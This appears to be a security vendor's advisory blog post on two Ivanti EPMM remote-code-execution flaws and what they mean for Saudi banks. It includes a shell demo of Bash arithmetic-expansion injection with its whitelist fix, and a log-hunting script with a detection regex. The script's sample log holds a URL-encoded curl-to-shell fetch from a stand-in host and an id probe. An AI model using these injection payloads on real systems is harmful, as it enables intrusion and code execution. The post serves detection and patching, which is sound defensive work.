
CVE-2026-1281 & CVE-2026-1340: The Ivanti EPMM Zero-Days Putting Saudi Bank MDM Fleets at Risk

A single bulletproof-hosted IP is driving 83% of active Ivanti EPMM exploitation via CVE-2026-1281 and CVE-2026-1340. Saudi banks running on-prem MDM face direct SAMA CSCC exposure — here is what to patch, hunt, and rotate now.

FyntraLink Team

Two unauthenticated remote code execution flaws in Ivanti Endpoint Manager Mobile (EPMM) — CVE-2026-1281 and CVE-2026-1340, both CVSS 9.8 — are under mass exploitation, with a single bulletproof-hosted IP address responsible for more than 83% of observed attacks. For Saudi financial institutions running EPMM to manage thousands of corporate-owned iPhones, iPads, and Android endpoints, this is not a theoretical risk. It is a live compromise path to the crown jewels of your mobile fleet.

Anatomy of the Ivanti EPMM Zero-Day Exploitation

Both vulnerabilities affect on-premises EPMM installations and stem from the same bug class: attacker-controlled input reaches a Bash arithmetic expansion ($(( ... ))) in the map-appstore-url script without validation. Bash evaluates array subscripts inside an arithmetic context, including any command substitution they contain, so a value of the form a[$(cmd)] runs cmd. An unauthenticated attacker issues a crafted HTTP GET request against the In-House Application Distribution endpoint (/mifs/c/appstore/fob/) or the Android File Transfer Configuration endpoint (/mifs/c/aftstore/fob/), and arbitrary OS commands execute on the appliance as the EPMM service user. Public proof-of-concept code has been circulating since 30 January 2026, and CVE-2026-1281 is now listed in the CISA Known Exploited Vulnerabilities catalog.
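The bug class in runnable form. This is an added example written for this article, not Ivanti's map-appstore-url script (which is not reproduced here): a two-line stand-in for the vulnerable evaluation, a proof that a crafted value executes a command, and the input check that closes the hole. The function names, the marker-file trick and the payload shape are this example's own, not the public proof of concept.

```shell
#!/usr/bin/env bash
# Added example: Bash arithmetic-expansion injection and its fix.
# Not Ivanti code; it models the bug class behind CVE-2026-1281 /
# CVE-2026-1340 with a minimal stand-in for the vulnerable script.

# Vulnerable pattern: the value comes straight from the request and is
# evaluated by $(( )). Bash expands array subscripts inside arithmetic,
# including command substitutions, so "a[$(cmd)]" runs cmd.
vulnerable_add() {
  input="$1"
  echo $(( input + 1 ))
}

# Hardened pattern: accept a plain decimal integer and nothing else,
# before the value ever reaches an arithmetic context.
safe_add() {
  input="$1"
  case "$input" in
    ''|*[!0-9]*) echo "rejected non-numeric input: $input" >&2; return 1 ;;
  esac
  echo $(( input + 1 ))
}

# Proof of execution: the injected command creates a marker file. The same
# two lines as vulnerable_add run in a child bash so that the arithmetic
# error the payload leaves behind cannot abort this script.
# Prints "executed" or "not_executed".
demo_injection() {
  marker=$(mktemp)
  rm -f "$marker"
  payload="a[\$(touch $marker; echo 0)]"
  bash -c 'input="$1"; echo $(( input + 1 ))' _ "$payload" >/dev/null 2>&1 || true
  if [ -e "$marker" ]; then
    rm -f "$marker"
    echo executed
  else
    echo not_executed
  fi
}

# Stand-alone run: the vulnerable path executes the payload; the hardened
# path rejects it and still works for legitimate numeric input.
echo "vulnerable path: $(demo_injection)"
safe_add 'a[$(id)]' || echo "hardened path: rejected"
echo "hardened path: 41 -> $(safe_add 41)"
```

The fix is deliberately a whitelist (digits only) rather than an attempt to strip "$(" and backticks: Bash offers several expansion routes inside an arithmetic context, and rejecting anything that is not the expected integer is the only check that does not have to enumerate them.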

Why One IP Is Driving 83% of the Attacks

Threat intelligence telemetry has traced the overwhelming majority of in-the-wild exploitation to a single IP hosted on bulletproof infrastructure, the same address simultaneously exploiting CVE-2026-21962 in Oracle WebLogic and CVE-2026-24061 in GNU Inetutils telnetd. The observed kill chain is fast and repeatable: initial command execution through the /fob/ endpoints, an immediate fetch of the /slt second-stage script, deployment of a web shell, and then either a cryptominer for opportunistic monetization or a persistent backdoor for follow-on access. In several incidents investigators recovered artifacts that map cleanly to prior ransomware-as-a-service (RaaS) tradecraft, which means a ransomware affiliate is using EPMM as the door.

Why EPMM Compromise Is Catastrophic for a Bank

EPMM is not a peripheral system. It holds the configuration profiles, VPN credentials, certificate trust chains, and push-notification keys for every managed mobile device on the executive floor, the trading desk, and the branch network. An attacker who controls the appliance can push a malicious configuration profile to every device in scope, silently install a custom root CA so that the devices' TLS traffic can be intercepted, issue arbitrary MDM commands including remote wipe, or harvest the MDM-issued certificates used for Wi-Fi and VPN access. In a Saudi banking context this is equivalent to compromising the privileged access management layer for the mobile estate, and it happens without tripping the SOC's traditional EDR controls, because the appliance itself is usually excluded from endpoint coverage.

Impact on Saudi Financial Institutions

Under the SAMA Cyber Security Control Central Framework (CSCC) subdomain 3.3.14 (Mobile Devices Security) and 3.3.9 (Vulnerability Management), the EPMM fleet sits squarely inside the regulated perimeter. Failure to patch a CISA KEV-listed vulnerability within SAMA's expected remediation window is a direct audit finding, and exploitation of EPMM becomes a reportable incident under the Banking Consumer Protection Principles and the Personal Data Protection Law (PDPL) the moment any customer-identifying data flows through a compromised device. For institutions assessed under NCA ECC-1:2018, controls 2-5-3 (Mobile Devices and BYOD Security) and 2-10-3 (Patch and Vulnerability Management) are in scope. Saudi banks running EPMM on-premises, still the dominant deployment model in the Kingdom because of data-residency requirements, cannot assume they are out of reach of this campaign: internet-facing EPMM consoles have been the norm for branch-manager provisioning, and that is exactly the attack surface the IP behind 83% of observed exploitation is scanning.

Recommendations and Practical Steps

  1. Apply Ivanti's emergency RPM patch (12.x.0.x or 12.x.1.x depending on your deployment branch) immediately — no downtime is required, and a permanent fix ships in 12.8.0.0.
  2. Hunt for the known IoCs in the appliance's web access logs: inbound HTTP GETs to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ carrying Bash-injection payloads (command substitution via "$(" or backticks, raw or URL-encoded), the appearance of a /slt file on the appliance, and new cron or systemd persistence under the tomcat or mifs service user.
  3. Block or tightly restrict management-plane access: the EPMM admin portal and the /mifs/c/ paths should sit behind a bastion or VPN, never on the public internet.
  4. Rotate every MDM-issued certificate, SCEP token, APNs key, and VPN profile secret provisioned through EPMM since 1 January 2026 — assume secret compromise until forensic evidence says otherwise.
  5. Sweep connected mobile devices for unauthorized configuration profiles, unexpected root CAs, and unexplained VPN endpoints pushed from the appliance.
  6. File an incident pre-notification to SAMA if compromise is confirmed, even if no data exfiltration is yet proven — the window shrinks once data subjects are involved.
  7. Engage penetration testing focused specifically on the MDM tier; most annual CBEST/SAMA CSCC assessments under-test this surface because it is treated as IT ops rather than security infrastructure.
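The first hunt in step 2, and the kill chain described above (a /fob/ request followed by a fetch of /slt), as an added example that is not part of the original article or of any Ivanti tooling. It runs a grep over the appliance's web access log in Apache combined format and pulls out the source IPs behind the hits; the log lines are constructed for this example, the query parameter name ("p") and the payload shape are placeholders rather than the public proof of concept, and the log path on a real EPMM appliance depends on your version, so pass it in as the argument.

```shell
#!/usr/bin/env bash
# Added example: hunting for exploitation attempts against the EPMM /fob/
# endpoints in the web access log. Not Ivanti tooling. The sample log,
# the parameter name "p" and the payload shape are constructed for this
# example; 203.0.113.77 and 198.51.100.9 are documentation addresses.

# Requests to either vulnerable endpoint whose query string carries a Bash
# command-substitution or parameter-expansion marker: "$(", backtick or
# "${", raw or URL-encoded (%24%28, %60, %24%7B). Matched case-insensitively
# so upper- and lower-case hex both hit.
FOB_INJECTION_RE='/mifs/c/(appstore|aftstore)/fob/[^ "]*(\$\(|%24%28|`|%60|\$\{|%24%7B)'

# Print every matching line from the access log given as $1.
hunt_fob_injection() {
  grep -Ei "$FOB_INJECTION_RE" "$1" || true
}

# Number of matching lines (0 when there are none).
count_fob_injection() {
  hunt_fob_injection "$1" | grep -c . || true
}

# Distinct source IPs behind the matches, one per line, sorted.
fob_attacker_ips() {
  hunt_fob_injection "$1" | awk '{ print $1 }' | sort -u
}

# Constructed sample log. 10.0.0.x is a benign internal client using the
# endpoint normally; 203.0.113.77 plays the attacker, first with a
# URL-encoded payload that pulls the /slt second stage, then with a raw
# probe against the aftstore endpoint.
write_sample_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
10.0.0.5 - - [02/Feb/2026:08:14:01 +0300] "GET /mifs/c/appstore/fob/?p=12345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [02/Feb/2026:08:14:09 +0300] "GET /mifs/c/appstore/fob/?p=a%5B%24%28curl%20-s%20http%3A%2F%2F198.51.100.9%2Fslt%7Csh%29%5D HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.77 - - [02/Feb/2026:08:14:10 +0300] "GET /mifs/c/aftstore/fob/?p=a[$(id)] HTTP/1.1" 500 0 "-" "curl/8.4.0"
10.0.0.6 - - [02/Feb/2026:08:15:00 +0300] "GET /mifs/admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
  echo "$f"
}

# Stand-alone run against the sample: expect two hits from one source IP.
log=$(write_sample_log)
echo "suspicious requests: $(count_fob_injection "$log")"
hunt_fob_injection "$log"
echo "source IPs: $(fob_attacker_ips "$log" | tr '\n' ' ')"
rm -f "$log"
```

A benign request to the same endpoint (the first sample line) does not fire, because the rule keys on the expansion markers rather than on the path alone. Any hit is worth treating as a compromise until the appliance has been checked for the /slt artifact and the persistence listed in step 2, since a 500 response does not mean the command failed to run.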

Conclusion

The Ivanti EPMM campaign is a textbook example of what SAMA CSCC calls out in subdomain 3.3.9: vulnerability exploitation windows are collapsing from weeks to hours, and infrastructure-level products with privileged reach across the mobile fleet must be treated as Tier-0 assets, not appliances. A single unpatched EPMM console is enough to invert your entire mobile security model.

Is your organization prepared? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment — our team will map your MDM, privileged infrastructure, and internet-facing administrative attack surface against SAMA CSCC and NCA ECC requirements, and deliver a prioritized remediation roadmap.